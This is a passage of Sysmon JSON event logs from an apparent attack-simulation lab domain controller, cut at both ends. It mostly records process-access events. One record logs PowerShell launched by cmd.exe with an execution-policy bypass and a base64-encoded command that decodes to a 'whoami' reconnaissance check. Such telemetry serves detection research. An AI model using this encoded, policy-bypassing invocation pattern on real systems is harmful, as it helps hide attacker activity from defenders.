C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2507,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2508,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2509,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2510,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01DE-5F25-0000-0010446C0400}\r\nSourceProcessId: 4344\r\nSourceThreadId: 4364\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-00108A790400}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01DE-5F25-0000-0010446C0400}","SourceProcessId":"4344","SourceThreadId":"4364","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-00108A790400}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2511,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.228\r\nProcessGuid: {A837DB8D-01DE-5F25-0000-0010C47A0400}\r\nProcessId: 4444\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-01DE-5F25-0000-00208A6B0400}\r\nLogonId: 0x46B8A\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-01DE-5F25-0000-00108A790400}\r\nParentProcessId: 4432\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.228","ProcessGuid":"{A837DB8D-01DE-5F25-0000-0010C47A0400}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-01DE-5F25-0000-00208A6B0400}","LogonId":"0x46b8a","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-01DE-5F25-0000-00108A790400}","ParentProcessId":"4432","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2512,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01DE-5F25-0000-00108A790400}\r\nSourceProcessId: 4432\r\nSourceThreadId: 4436\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010C47A0400}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01DE-5F25-0000-00108A790400}","SourceProcessId":"4432","SourceThreadId":"4436","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010C47A0400}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2513,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010C47A0400}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010C47A0400}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2514,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2515,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 